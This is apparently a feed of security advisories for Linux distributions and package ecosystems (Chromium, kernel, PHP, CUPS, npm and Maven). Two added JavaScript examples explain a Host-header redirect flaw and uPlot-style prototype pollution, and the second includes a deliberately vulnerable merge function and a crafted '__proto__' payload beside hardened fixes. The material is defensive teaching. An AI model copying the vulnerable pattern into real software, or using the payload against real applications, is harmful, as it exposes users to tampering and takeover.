28.09.2024 03:18:13fedora[FEDORA-2024-8008ddbd4e] Fedora 41: chromium (high)Update to 129.0.6668.70 * High CVE-2024-9120: Use after free in Dawn * High CVE-2024-9121: Inappropriate implementation in V8 * High CVE-2024-9122: Type Confusion in V8 * High CVE-2024-9123: Integer overflow in Skiahttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8008ddbd4e
27.09.2024 18:11:57suse[SUSE-SU-2024:3483-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3483-1
27.09.2024 16:23:44suse[SUSE-SU-2024:3478-1] Security update for quagga (important)Security update for quaggahttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3478-1
27.09.2024 15:35:59suse[SUSE-SU-2024:3470-1] Security update for python3 (important)Security update for python3https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3470-1
27.09.2024 13:34:23suse[SUSE-SU-2024:3468-1] Security update for the Linux Kernel (Live Patch 1 for SLE 15 SP6) (important)Security update for the Linux Kernel (Live Patch 1 for SLE 15 SP6)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3468-1
27.09.2024 13:20:00suse[SUSE-SU-2024:3467-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3467-1
27.09.2024 10:24:20almalinux[ALSA-2024:7262] osbuild-composer security update (important)osbuild-composer security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7262
27.09.2024 12:50:28almalinux[ALSA-2024:7204] osbuild-composer security update (important)osbuild-composer security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7204
27.09.2024 10:22:47almalinux[ALSA-2024:7260] net-snmp security update (moderate)net-snmp security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7260
29.09.2024 04:38:21fedora[FEDORA-2024-5db248f2a0] Fedora 40: cjson (high)Update to new upstream version (closes rhbz#2237124)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5db248f2a0
28.09.2024 13:34:18almalinux[ALSA-2024:7346] cups-filters security update (important)cups-filters security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7346
29.09.2024 15:05:10rubysec[RUBYSEC:CAMALEON_CMS-75J2-9GMC-M855] Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184) (medium)
A stored cross-site scripting has been found in the image upload functionality that can be used by normal registered users: It is possible to upload an SVG image containing JavaScript and it's also possible to upload an HTML document when the format parameter is manually changed to [documents][1] or a string of an [unsupported format][2]. If an authenticated user or administrator visits that uploaded image or document, malicious JavaScript can be executed on their behalf (e.g. changing or deleting content inside of the CMS).
[1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106
[2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111
## Impact
This issue may lead to account takeover due to reflected Cross-site scripting (XSS).
## Remediation
Only allow the upload of safe files such as PNG, TXT and others, or serve all "unsafe" files such as SVG and other files with a content-disposition: attachment header, which should prevent browsers from displaying them.
Additionally, a [Content security policy (CSP)][3] can be created that disallows inlined script. (Other parts of the application might need modification to continue functioning.)
[3]: https://web.dev/articles/csp
To prevent the theft of the auth_token it could be marked with HttpOnly. This would however not prevent that actions could be performed as the authenticated user/administrator. Furthermore, it could make sense to use the authentication provided by Ruby on Rails, so that stolen tokens cannot be used anymore after some time.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CAMALEON_CMS-75J2-9GMC-M855
01.10.2024 10:04:10ubuntu[USN-7015-3] Python vulnerabilityPython could be made to bypass some restrictions if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7015-3
01.10.2024 09:53:06ubuntu[USN-7047-1] Knot Resolver vulnerabilitiesSeveral security issues were fixed in knot-resolver.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7047-1
30.09.2024 21:14:43ubuntu[USN-7046-1] Flatpak and Bubblewrap vulnerabilityFlatpak could be made to read and write files in locations it would not normally have access to.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7046-1
30.09.2024 23:11:41 | npm | [NPM:GHSA-7P89-P6HX-Q4FW] basic-auth-connect's callback uses time unsafe string comparison (high) | ### Impact basic-auth-connect <1.1.0 uses a timing-unsafe equality comparison that can leak timing information. ### Patches This issue has been fixed in basic-auth-connect 1.1.0. ### References | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7P89-P6HX-Q4FW
30.09.2024 17:33:13 | rockylinux | [RLSA-2024:6963] gtk3 security update (moderate) | An update is available for gtk3. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6963
30.09.2024 17:33:13 | rockylinux | [RLBA-2024:6965] pacemaker bug fix update (none) | An update is available for pacemaker. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6965
30.09.2024 17:33:14 | rockylinux | [RLBA-2024:6967] xmlsec1 bug fix update (none) | An update is available for xmlsec1. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6967
30.09.2024 17:33:14 | rockylinux | [RLBA-2024:6970] cloud-init bug fix and enhancement update (none) | An update is available for cloud-init. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6970
30.09.2024 17:33:14 | rockylinux | [RLBA-2024:6971] edk2 bug fix and enhancement update (none) | An update is available for edk2. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6971
30.09.2024 17:33:14 | rockylinux | [RLBA-2024:6972] gnome-keyring bug fix update (none) | An update is available for gnome-keyring. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6972
30.09.2024 17:33:14 | rockylinux | [RLBA-2024:6974] libX11 bug fix update (none) | An update is available for libX11. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6974
30.09.2024 17:33:13 | rockylinux | [RLSA-2024:6837] pcp security update (important) | An update is available for pcp. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6837
30.09.2024 17:33:13 | rockylinux | [RLSA-2024:6961] python3.12 security update (moderate) | An update is available for python3.12. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6961
30.09.2024 17:33:13 | rockylinux | [RLSA-2024:6962] python3.11 security update (moderate) | An update is available for python3.11. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6962
30.09.2024 17:33:14 | rockylinux | [RLBA-2024:6968] tigervnc bug fix update (none) | An update is available for tigervnc. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6968
30.09.2024 17:33:14 | rockylinux | [RLSA-2024:6973] dovecot security update (moderate) | An update is available for dovecot. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6973
30.09.2024 17:33:14 | rockylinux | [RLSA-2024:7135] git-lfs security update (important) | An update is available for git-lfs. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:7135
30.09.2024 17:33:14 | rockylinux | [RLSA-2024:7262] osbuild-composer security update (important) | An update is available for osbuild-composer. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:7262
30.09.2024 17:33:09 | rockylinux | [RLBA-2024:6981] libldb bug fix update (none) | An update is available for libldb. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6981
30.09.2024 17:33:09 | rockylinux | [RLBA-2024:6982] blktrace bug fix update (none) | An update is available for blktrace. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6982
30.09.2024 17:33:09 | rockylinux | [RLSA-2024:6975] python3 security update (moderate) | An update is available for python3. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6975
30.09.2024 17:33:09 | rockylinux | [RLBA-2024:6976] findutils bug fix update (none) | An update is available for findutils. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6976
30.09.2024 17:33:09 | rockylinux | [RLBA-2024:6977] systemd bug fix update (none) | An update is available for systemd. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6977
30.09.2024 17:33:09 | rockylinux | [RLBA-2024:6980] kexec-tools bug fix update (none) | An update is available for kexec-tools. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6980
30.09.2024 17:33:09 | rockylinux | [RLBA-2024:6983] libuser bug fix and enhancement update (none) | An update is available for libuser. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6983
30.09.2024 17:33:09 | rockylinux | [RLSA-2024:6986] nano security update (low) | An update is available for nano. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6986
30.09.2024 17:33:09 | rockylinux | [RLSA-2024:6989] expat security update (moderate) | An update is available for expat. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6989
30.09.2024 17:14:17 | suse | [SUSE-SU-2024:3500-1] Security update for openssl-3 (important) | Security update for openssl-3 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3500-1
30.09.2024 13:52:07 | suse | [SUSE-SU-2024:3499-1] Security update for the Linux Kernel (important) | Security update for the Linux Kernel | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3499-1
01.10.2024 00:46:45 | maven | [MAVEN:GHSA-G643-XQ6W-R67C] Deserialization of Untrusted Data vulnerability in Apache Lucene Replicator. (moderate) | This issue affects Apache Lucene's replicator module: from 4.4.0 before 9.12.0. The deprecated org.apache.lucene.replicator.http package is affected. The org.apache.lucene.replicator.nrt package is not affected. Users are recommended to upgrade to version 9.12.0, which fixes the issue. Java serialization filters (such as -Djdk.serialFilter='!*' on the commandline) can mitigate the issue on vulnerable versions without impacting functionality. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G643-XQ6W-R67C
30.09.2024 20:13:46 | maven | [MAVEN:GHSA-JQ3F-MFMG-747X] Eclipse Glassfish improperly handles http parameters (moderate) | In Eclipse Glassfish versions before 7.0.17, the Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is `/management/domain`. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JQ3F-MFMG-747X
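The Host-header redirect pattern described above, beside the allowlist-based fix, as an added Node.js example; it is not GlassFish code, and the allowed host names, the `/management/domain/` target path and the request shape are assumptions for the example. The hardened version never copies the client's Host value into Location: it parses it, lower-cases the name, checks it against the configured canonical hosts, and falls back to the canonical name otherwise.

```javascript
// Added example, not GlassFish code: building a redirect from a fixed set of
// canonical hosts instead of echoing the request's Host header. The host
// allowlist, path and request shape are assumptions for this example.
const ALLOWED_HOSTS = new Set(['admin.example.com', 'localhost']);

// Vulnerable: Location is built from whatever Host the client chose to send,
// so "Host: evil.example" sends the user (and their next login) to the attacker.
function vulnerableLocation(req) {
  return `https://${req.headers.host}/management/domain/`;
}

// Parse "host[:port]" (or "[v6]:port"), lower-case the name and accept it only
// if it is on the allowlist; returns null for anything else, including values
// carrying userinfo ("@"), paths or whitespace that the regex does not admit.
function canonicalHost(hostHeader) {
  if (typeof hostHeader !== 'string') return null;
  const m = /^([a-z0-9.-]+|\[[0-9a-f:.]+\])(?::(\d{1,5}))?$/i.exec(hostHeader.trim());
  if (!m) return null;
  const name = m[1].toLowerCase();
  if (!ALLOWED_HOSTS.has(name)) return null;
  return m[2] ? `${name}:${m[2]}` : name;
}

// Hardened: an unknown or malformed Host falls back to the canonical name.
function safeLocation(req, fallback = 'admin.example.com') {
  const host = canonicalHost(req.headers.host) || fallback;
  return `https://${host}/management/domain/`;
}
```

Behind a reverse proxy the same rule applies to `X-Forwarded-Host`: either the proxy is configured to overwrite it, or the application validates it against the same allowlist.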
30.09.2024 03:00:00 | cisa | [CISA-2024:0930] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (critical) | CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0930
30.09.2024 03:00:00 | redhat | [RHSA-2024:7349] grafana security update (moderate) | Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Security Fix(es): * net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:7349
30.09.2024 23:56:49 | npm | [NPM:GHSA-M5P9-XVXJ-64C8] Flowise and Flowise Chat Embed vulnerable to Stored Cross-site Scripting (moderate) | Flowise < 2.1.1 suffers from a Stored Cross-Site Scripting vulnerability due to a lack of input sanitization in Flowise Chat Embed < 2.0.0. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M5P9-XVXJ-64C8
02.10.2024 04:33:42 | fedora | [FEDORA-2024-82f3634c69] Fedora 41: cjson (high) | Update to new upstream version (closes rhbz#2237124) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-82f3634c69
02.10.2024 04:33:41 | fedora | [FEDORA-2024-a03b06dbd0] Fedora 41: php (critical) | PHP version 8.3.12 (26 Sep 2024) CGI: Fixed bug GHSA-p99j-rfp4-xqvq (Bypass of CVE-2024-4577, Parameter Injection Vulnerability). (CVE-2024-8926) (nielsdos) Fixed bug GHSA-94p6-54jq-9mwp (cgi.force_redirect configuration is bypassable due to the environment variable collision). (CVE-2024-8927) (nielsdos) Core: Fixed bug GH-15408 (MSan false-positive on zend_max_execution_timer). (zeriyoshi) Fixed bug GH-15515 (Configure error grep illegal option q). (Peter Kokot) Fixed bug GH-15514 (Configure error: genif.sh: syntax error). (Peter Kokot) Fixed bug GH-15565 (--disable-ipv6 during compilation produces error EAI_SYSTEM not found). (nielsdos) Fixed bug GH-15587 (CRC32 API build error on arm 32-bit). (Bernd Kuhls, Thomas Petazzoni) Fixed bug GH-15330 (Do not scan generator frames more than once). (Arnaud) Fixed uninitialized lineno in constant AST of internal enums. (ilutov) Curl: Fixed bug GH-15547 (curl_multi_select overflow on timeout argument). (David Carlier) DOM: Fixed bug GH-15551 (Segmentation fault (access null pointer) in ext/dom/xml_common.h). (nielsdos) Fixed bug GH-15654 (Signed integer overflow in ext/dom/nodelist.c). (nielsdos) Fileinfo: Fixed bug GH-15752 (Incorrect error message for finfo_file with an empty filename argument). (DanielEScherzer) FPM: Fixed bug GHSA-865w-9rf3-2wh5 (Logs from children may be altered). (CVE-2024-9026) (Jakub Zelenka) MySQLnd: Fixed bug GH-15432 (Heap corruption when querying a vector). (cmb, Kamil Tekiela) Opcache: Fixed bug GH-15661 (Access null pointer in Zend/Optimizer/zend_inference.c). (nielsdos) Fixed bug GH-15658 (Segmentation fault in Zend/zend_vm_execute.h). (nielsdos) SAPI: Fixed bug GHSA-9pqp-7h25-4f32 (Erroneous parsing of multipart form data). (CVE-2024-8925) (Arnaud) Standard: Fixed bug GH-15552 (Signed integer overflow in ext/standard/scanf.c). (cmb) Streams: Fixed bug GH-15628 (php_stream_memory_get_buffer() not zero-terminated). (cmb) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a03b06dbd0
01.10.2024 22:05:36 | slackware | [SSA:2024-275-03] rpath security issues | Several packages have been updated for Slackware 15.0 and -current to fix rpath security issues. **Here are the details from the Slackware 15.0 ChangeLog** ``` Several ELF objects were found to have rpaths pointing into /tmp, a world writable directory. This could have allowed a local attacker to launch denial of service attacks or execute arbitrary code when the affected binaries are run by placing crafted ELF objects in the /tmp rpath location. All rpaths with an embedded /tmp path have been scrubbed from the binaries, and makepkg has gained a lint feature to detect these so that they won't creep back in. extra/llvm-17.0.6-i586-2_slack15.0.txz: Rebuilt. Remove rpaths from binaries. (* Security fix *) patches/packages/cryfs-0.10.3-i586-5_slack15.0.txz: Rebuilt. Remove rpaths from binaries. (* Security fix *) patches/packages/espeak-ng-1.50-i586-4_slack15.0.txz: Rebuilt. Remove rpaths from binaries. (* Security fix *) patches/packages/libvncserver-0.9.13-i586-4_slack15.0.txz: Rebuilt. Remove rpaths from binaries. (* Security fix *) patches/packages/marisa-0.2.6-i586-5_slack15.0.txz: Rebuilt. Remove rpaths from binaries. (* Security fix *) patches/packages/mlt-7.4.0-i586-2_slack15.0.txz: Rebuilt. Remove rpaths from binaries. (* Security fix *) patches/packages/openobex-1.7.2-i586-6_slack15.0.txz: Rebuilt. Remove rpaths from binaries. (* Security fix *) patches/packages/pkgtools-15.0-noarch-44_slack15.0.txz: Rebuilt. makepkg: when looking for ELF objects with --remove-rpaths or --remove-tmp-rpaths, avoid false hits on files containing 'ELF' as part of the directory or filename. Also warn about /tmp rpaths after the package is built. patches/packages/spirv-llvm-translator-13.0.0-i586-2_slack15.0.txz: Rebuilt. Remove rpaths from binaries. (* Security fix *) testing/packages/llvm-18.1.8-i686-2_slack15.0.txz: Rebuilt. Remove rpaths from binaries. (* Security fix *) ``` **Installation instructions** Upgrade the packages using upgradepkg or slackpkg. | https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-275-03
01.10.2024 22:05:19 | slackware | [SSA:2024-275-02] mozilla-firefox | New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ``` patches/packages/mozilla-firefox-115.16.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.16.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-48 https://www.cve.org/CVERecord?id=CVE-2024-9392 https://www.cve.org/CVERecord?id=CVE-2024-9393 https://www.cve.org/CVERecord?id=CVE-2024-9394 https://www.cve.org/CVERecord?id=CVE-2024-9401 (* Security fix *) ``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.16.0esr-i686-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.16.0esr-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.3.0esr-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.3.0esr-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 8f81f39a0345c80c5d3abbb65db4586c mozilla-firefox-115.16.0esr-i686-1_slack15.0.txz Slackware x86_64 15.0 package: fdf2153143e65c8d599e01b226317457 mozilla-firefox-115.16.0esr-x86_64-1_slack15.0.txz Slackware -current package: 492342bfdf0951e127a62efa3fc33d66 xap/mozilla-firefox-128.3.0esr-i686-1.txz Slackware x86_64 -current package: 521af09cb4f16b345a003cce028bf689 xap/mozilla-firefox-128.3.0esr-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg mozilla-firefox-115.16.0esr-i686-1_slack15.0.txz` | https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-275-02
01.10.2024 22:04:59 | slackware | [SSA:2024-275-01] cups-filters/cups-browsed | New cups-filters (Slackware 15.0) and cups-browsed (Slackware -current) packages are available to fix a security issue. **Here are the details from the Slackware 15.0 ChangeLog** ``` patches/packages/cups-filters-1.28.17-i586-2_slack15.0.txz: Rebuilt. Mitigate security issue that could lead to a denial of service or the execution of arbitrary code. Rebuilt with --with-browseremoteprotocols=none to disable incoming connections, since this daemon has been shown to be insecure. If you actually use cups-browsed, be sure to install the new /etc/cups/cups-browsed.conf.new containing this line: BrowseRemoteProtocols none For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-47176 (* Security fix *) ``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/cups-filters-1.28.17-i586-2_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/cups-filters-1.28.17-x86_64-2_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/cups-browsed-2.0.1-i686-2.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/cups-browsed-2.0.1-x86_64-2.txz **MD5 signatures** Slackware 15.0 package: e0a64ab06dee885bff6f1abe3030d5e5 cups-filters-1.28.17-i586-2_slack15.0.txz Slackware x86_64 15.0 package: feb795ef30a6b083f86fbaa4b2496c86 cups-filters-1.28.17-x86_64-2_slack15.0.txz Slackware -current package: 34c5b2e590b67bd7116808308ec736e6 ap/cups-browsed-2.0.1-i686-2.txz Slackware x86_64 -current package: 788dd278e60096097a661e0fad264234 ap/cups-browsed-2.0.1-x86_64-2.txz **Installation instructions** Upgrade the package as root: `# upgradepkg cups-filters-1.28.17-i586-2_slack15.0.txz` If you use cups-browsed, be sure that your /etc/cups/cups-browsed.conf contains this line: BrowseRemoteProtocols none | https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-275-01
01.10.2024 18:02:17 | suse | [SUSE-SU-2024:3507-1] Security update for MozillaThunderbird (important) | Security update for MozillaThunderbird | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3507-1
01.10.2024 17:47:15 | ubuntu | [USN-7050-1] Devise-Two-Factor vulnerabilities | Several security issues were fixed in Devise-Two-Factor. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7050-1
01.10.2024 17:43:31 | suse | [SUSE-SU-2024:3505-1] Security update for OpenIPMI (moderate) | Security update for OpenIPMI | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3505-1
01.10.2024 17:03:50 | suse | [SUSE-SU-2024:3502-1] Security update for openvpn (moderate) | Security update for openvpn | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3502-1
01.10.2024 17:03:35 | suse | [SUSE-SU-2024:3501-1] Security update for openssl-3 (important) | Security update for openssl-3 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3501-1
01.10.2024 16:54:08 | ubuntu | [USN-7022-2] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7022-2
01.10.2024 16:46:20 | ubuntu | [USN-7043-2] cups-filters vulnerability | cups-filters could be made to run programs if it received specially crafted network traffic. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7043-2
01.10.2024 16:24:27 | ubuntu | [USN-7049-1] PHP vulnerabilities | Several security issues were fixed in PHP. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7049-1
01.10.2024 16:21:56 | ubuntu | [USN-7003-5] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7003-5
01.10.2024 15:25:03 | ubuntu | [USN-7048-1] Vim vulnerability | Vim could be made to crash if it received specially crafted input. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7048-1
01.10.2024 14:15:31 | ubuntu | [USN-7041-2] CUPS vulnerability | CUPS could be made to crash or run programs if it received specially crafted network traffic. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7041-2
01.10.2024 14:11:43 | ubuntu | [USN-6964-2] ORC vulnerability | ORC could be made to crash or execute arbitrary code. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6964-2
01.10.2024 21:10:51 | npm | [NPM:GHSA-34Q8-JCQ6-MC37] uPlot Prototype Pollution vulnerability (high) | Versions of the package uplot before 1.6.31 are vulnerable to Prototype Pollution via the uplot.assign function due to a missing check of whether the attribute resolves to the object prototype. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-34Q8-JCQ6-MC37
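The shape of the bug above, as an added Node.js example that is not uPlot's code: a recursive options merge that walks into a `"__proto__"` key (and so writes attacker-chosen properties onto `Object.prototype`), next to a merge that refuses prototype keys and only touches own properties. The payload and option names are constructed for the example.

```javascript
// Added example, not uPlot's code: a recursive options merge that follows
// "__proto__" (the vulnerable shape) beside one that refuses prototype keys.
// The payload and option names are constructed for this example.

function vulnerableAssign(target, source) {
  for (const key in source) {
    const val = source[key];
    if (val !== null && typeof val === 'object' && !Array.isArray(val)) {
      // For key === "__proto__", target[key] is Object.prototype, so the
      // recursion below writes attacker keys onto every plain object.
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      vulnerableAssign(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

function safeAssign(target, source) {
  for (const key of Object.keys(source)) {          // own enumerable keys only
    if (FORBIDDEN.has(key)) continue;                // never walk prototype links
    const val = source[key];
    // defineProperty writes an own data property and sidesteps inherited setters.
    const define = (v) => Object.defineProperty(target, key,
      { value: v, writable: true, enumerable: true, configurable: true });
    if (val !== null && typeof val === 'object' && !Array.isArray(val)) {
      // Only descend into an existing *own* object; never into an inherited one.
      if (!hasOwn(target, key) || target[key] === null || typeof target[key] !== 'object') define({});
      safeAssign(target[key], val);
    } else {
      define(val);
    }
  }
  return target;
}

// Attacker-controlled options as they would arrive from JSON (constructed).
const PAYLOAD = '{"series":{"__proto__":{"polluted":"yes"}}}';

function demo() {
  const before = ({}).polluted;                       // undefined
  vulnerableAssign({}, JSON.parse(PAYLOAD));
  const afterVulnerable = ({}).polluted;              // "yes", on every object
  delete Object.prototype.polluted;                   // undo for the rest of the process
  const merged = safeAssign({ series: { width: 1 } }, JSON.parse(PAYLOAD));
  const afterSafe = ({}).polluted;                    // still undefined
  return { before, afterVulnerable, afterSafe, merged };
}
```

`JSON.parse` is what makes the attack reachable: it creates an own property literally named `__proto__`, which `for...in` enumerates and which `target["__proto__"]` then resolves through the accessor to `Object.prototype`. The hardened merge also skips `constructor` (and `prototype` beneath it), the other route to the same object.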
